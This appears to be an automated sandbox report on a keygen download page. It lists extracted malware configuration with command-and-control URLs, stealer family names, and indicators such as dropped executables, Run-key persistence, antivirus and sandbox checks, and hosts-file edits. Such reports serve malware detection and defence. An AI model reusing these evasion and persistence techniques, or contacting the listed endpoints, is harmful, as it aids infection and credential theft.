Resubmissions
10-04-2021 05:28
210410-642g16c6y6 1009-04-2021 16:57
210409-a3zwd3zjvx 1009-04-2021 05:30
210409-4qr2p4p1m6 10Analysis
-
max time kernel
127s -
max time network
300s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-04-2021 16:57
Static task
static1
URLScan task
urlscan1
Sample
https://keygenit.com/d/30f8668638112r4p2203.html
Behavioral task
behavioral1
Sample
https://keygenit.com/d/30f8668638112r4p2203.html
Resource
win10v20201028
Behavioral task
behavioral2
Sample
https://keygenit.com/d/30f8668638112r4p2203.html
Resource
win10v20201028
Behavioral task
behavioral3
Sample
https://keygenit.com/d/30f8668638112r4p2203.html
Resource
win10v20201028
General
-
Target
https://keygenit.com/d/30f8668638112r4p2203.html
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
raccoon
a6bfe7e504db71e25642b830fd9b2c4366cf882a
-
url4cnc
https://telete.in/j90dadarobin
Extracted
icedid
1925120085
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 341 7212 MsiExec.exe 348 7212 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts ysAGEL.exe File opened for modification C:\Windows\system32\drivers\etc\hosts alpATCHInO.exe -
Executes dropped EXE 64 IoCs
pid Process 1332 keygen-pr.exe 4972 keygen-step-1.exe 3924 keygen-step-2.exe 4140 keygen-step-3.exe 4280 keygen-step-4.exe 5048 key.exe 5080 Setup.exe 4760 multitimer.exe 2324 setups.exe 1596 Full Version.exe 2564 setups.tmp 4852 6477.tmp.exe 3664 askinstall20.exe 5036 multitimer.exe 4604 multitimer.exe 4168 z3t0iohdxck.exe 3672 z3t0iohdxck.tmp 5740 chrome.exe 5764 Setup3310.exe 5772 Conhost.exe 5840 Setup3310.tmp 5884 jfiag3g_gg.exe 5916 app.exe 5944 ec2eowpfcms.exe 5976 ebgk3ugky5a.exe 5984 vpn.exe 6088 IBInstaller_97039.exe 6096 apipostback.exe 3392 vpn.tmp 3920 IBInstaller_97039.tmp 6160 vdi_compiler.exe 6680 md2_2efs.exe 6644 Setup.exe 6812 hjjgaa.exe 6820 Windows Host.exe 6860 Weather_Installation.exe 6876 Three.exe 6868 guihuali-game.exe 6884 LabPicV3.exe 6944 RunWW.exe 6956 lylal220.exe 6988 XOoRXgN90WGr.exe 7008 Raw4vpn.exe 7056 LabPicV3.tmp 7112 Conhost.exe 6776 alpATCHInO.exe 6064 ysAGEL.exe 6244 jfiag3g_gg.exe 6740 multitimer.exe 6632 setups.exe 7232 setups.tmp 7552 tapinstall.exe 8100 jfiag3g_gg.exe 8108 multitimer.exe 7328 multitimer.exe 7520 prolab.exe 7656 prolab.tmp 5716 Libaexazhipi.exe 7808 irecord.exe 7840 Byrymasudu.exe 6384 irecord.tmp 420 Waevefezhyvy.exe 7824 Mashukitogi.exe 5900 i-record.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation 6387974.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 58 IoCs
pid Process 2564 setups.tmp 2564 setups.tmp 2564 setups.tmp 2564 setups.tmp 2564 setups.tmp 2564 setups.tmp 2564 setups.tmp 4584 rundll32.exe 3672 z3t0iohdxck.tmp 5840 Setup3310.tmp 5840 Setup3310.tmp 5976 ebgk3ugky5a.exe 3920 IBInstaller_97039.tmp 4852 6477.tmp.exe 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 6804 MsiExec.exe 6804 MsiExec.exe 7056 LabPicV3.tmp 7112 Conhost.exe 6804 MsiExec.exe 6472 rundll32.exe 6832 regsvr32.exe 6384 irecord.tmp 7212 MsiExec.exe 7232 setups.tmp 7232 setups.tmp 7232 setups.tmp 7232 setups.tmp 7232 setups.tmp 7232 setups.tmp 7232 setups.tmp 7212 MsiExec.exe 6944 RunWW.exe 6944 RunWW.exe 7212 MsiExec.exe 7212 MsiExec.exe 7212 MsiExec.exe 7212 MsiExec.exe 5900 i-record.exe 5900 i-record.exe 5900 i-record.exe 5900 i-record.exe 5900 i-record.exe 5900 i-record.exe 5900 i-record.exe 5900 i-record.exe 7212 MsiExec.exe 7212 MsiExec.exe 7212 MsiExec.exe 6820 Windows Host.exe 6820 Windows Host.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\SHaedishuteri.exe\"" alpATCHInO.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\qkbebglxvxt = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\IURXHCO9HY\\multitimer.exe\" 1 3.1617987558.607087e6a8961" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\k4n23aqjv3j = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\ASEU36ETHC\\multitimer.exe\" 1 3.1617987594.6070880ad35c1" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MaskVPN\\Juxixuwaelae.exe\"" ysAGEL.exe -
Checks for any installed AV software in registry 1 TTPs 64 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6387974.exe -
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json askinstall20.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\K: ebgk3ugky5a.exe File opened (read-only) \??\R: ebgk3ugky5a.exe File opened (read-only) \??\S: ebgk3ugky5a.exe File opened (read-only) \??\Z: ebgk3ugky5a.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: ebgk3ugky5a.exe File opened (read-only) \??\N: ebgk3ugky5a.exe File opened (read-only) \??\U: ebgk3ugky5a.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: ebgk3ugky5a.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\L: ebgk3ugky5a.exe File opened (read-only) \??\O: ebgk3ugky5a.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\T: ebgk3ugky5a.exe File opened (read-only) \??\V: ebgk3ugky5a.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: ebgk3ugky5a.exe File opened (read-only) \??\F: ebgk3ugky5a.exe File opened (read-only) \??\H: ebgk3ugky5a.exe File opened (read-only) \??\J: ebgk3ugky5a.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: ebgk3ugky5a.exe File opened (read-only) \??\G: ebgk3ugky5a.exe File opened (read-only) \??\I: ebgk3ugky5a.exe File opened (read-only) \??\P: ebgk3ugky5a.exe File opened (read-only) \??\Q: ebgk3ugky5a.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: ebgk3ugky5a.exe File opened (read-only) \??\X: ebgk3ugky5a.exe File opened (read-only) \??\Y: ebgk3ugky5a.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 430 ip-api.com 259 ipinfo.io 265 ipinfo.io 305 ip-api.com 407 ipinfo.io 409 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\P24DXJDG.cookie svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\P24DXJDG.cookie svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2540 set thread context of 388 2540 svchost.exe 169 PID 6820 set thread context of 6944 6820 Windows Host.exe 230 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\MaskVPN\driver\win764\is-L8G7Q.tmp vpn.tmp File created C:\Program Files (x86)\Installation V156\is-N3T1P.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-26DA0.tmp vpn.tmp File opened for modification C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe Setup.exe File created C:\Program Files\api-ms-win-crt-runtime-l1-1-0.dll guihuali-game.exe File created C:\Program Files\unins.vbs guihuali-game.exe File created C:\Program Files (x86)\i-record\is-21FIK.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-H1KTS.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-IJLFJ.tmp vpn.tmp File opened for modification C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Uninstall.exe Setup.exe File opened for modification C:\Program Files (x86)\i-record\avdevice-53.dll irecord.tmp File created C:\Program Files\unins0000.dat Full Version.exe File opened for modification C:\Program Files (x86)\Installation V156\mrmsupport.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-1QRU5.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-V9PS8.tmp vpn.tmp File created C:\Program Files\jp2native.dll guihuali-game.exe File created C:\Program Files\Google\QXHLLUMRTT\prolab.exe.config alpATCHInO.exe File created C:\Program Files (x86)\Picture Lab\is-GV731.tmp prolab.tmp File created C:\Program Files (x86)\Picture Lab\is-TTVKT.tmp prolab.tmp File opened for modification C:\Program Files (x86)\Installation V156\stdvcl40.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\i-record\unins000.dat irecord.tmp File created C:\Program Files (x86)\i-record\is-36APM.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-7L9CC.tmp irecord.tmp File opened for modification C:\Program Files (x86)\i-record\postproc-52.dll irecord.tmp File created C:\Program Files (x86)\MaskVPN\is-1NTBD.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-VON59.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-ABL83.tmp vpn.tmp File opened for modification C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe Setup.exe File opened for modification C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe Setup.exe File created C:\Program Files\Java\RLUKRNKDKY\irecord.exe ysAGEL.exe File opened for modification C:\Program Files (x86)\i-record\avcodec-53.dll irecord.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File opened for modification C:\Program Files (x86)\Installation V156\libquadmath-0.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\Installation V156\is-3KAU3.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-H1V3F.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-RA8BO.tmp vpn.tmp File opened for modification C:\Program Files (x86)\i-record\i-record.exe irecord.tmp File opened for modification C:\Program Files (x86)\Installation V156\java.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\Installation V156\is-CKHGL.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\Picture Lab\is-I3OFQ.tmp prolab.tmp File created C:\Program Files\api-ms-win-crt-convert-l1-1-0.dll Full Version.exe File created C:\Program Files (x86)\MaskVPN\is-K6IRT.tmp vpn.tmp File created C:\Program Files (x86)\Installation V156\is-5U3O5.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-M42TJ.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File opened for modification C:\Program Files (x86)\Picture Lab\DockingToolbar.dll prolab.tmp File created C:\Program Files (x86)\Windows Multimedia Platform\SHaedishuteri.exe alpATCHInO.exe File created C:\Program Files (x86)\i-record\is-G2NGJ.tmp irecord.tmp File created C:\Program Files (x86)\Installation V156\is-PLNMO.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-SODR2.tmp vpn.tmp File created C:\Program Files\dcpr.dll guihuali-game.exe File created C:\Program Files\Google\QXHLLUMRTT\prolab.exe alpATCHInO.exe File opened for modification C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll prolab.tmp File opened for modification C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll irecord.tmp File opened for modification C:\Program Files (x86)\i-record\Bunifu_UI_v1.52.dll irecord.tmp File created C:\Program Files (x86)\Installation V156\is-1BBBC.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\i-record\is-P48U7.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Installation V156\libstdc++-6.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\Installation V156\unins000.dat IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-17I1B.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-7EUOT.tmp vpn.tmp -
Drops file in Windows directory 17 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSIFA91.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEBE7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF436.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFEA9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3674.tmp msiexec.exe File created C:\Windows\Installer\f75e32d.msi msiexec.exe File opened for modification C:\Windows\Installer\f75e32d.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI350C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3925.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSIF109.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF783.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RunWW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RunWW.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 4492 timeout.exe 7820 timeout.exe 6468 timeout.exe 6528 timeout.exe 5056 timeout.exe 6032 timeout.exe 7972 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier svchost.exe -
Kills process with taskkill 8 IoCs
pid Process 4264 taskkill.exe 5236 taskkill.exe 3340 taskkill.exe 6664 taskkill.exe 6760 taskkill.exe 4948 taskkill.exe 7708 taskkill.exe 7544 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main 6387974.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe -
Modifies registry class 64 IoCs
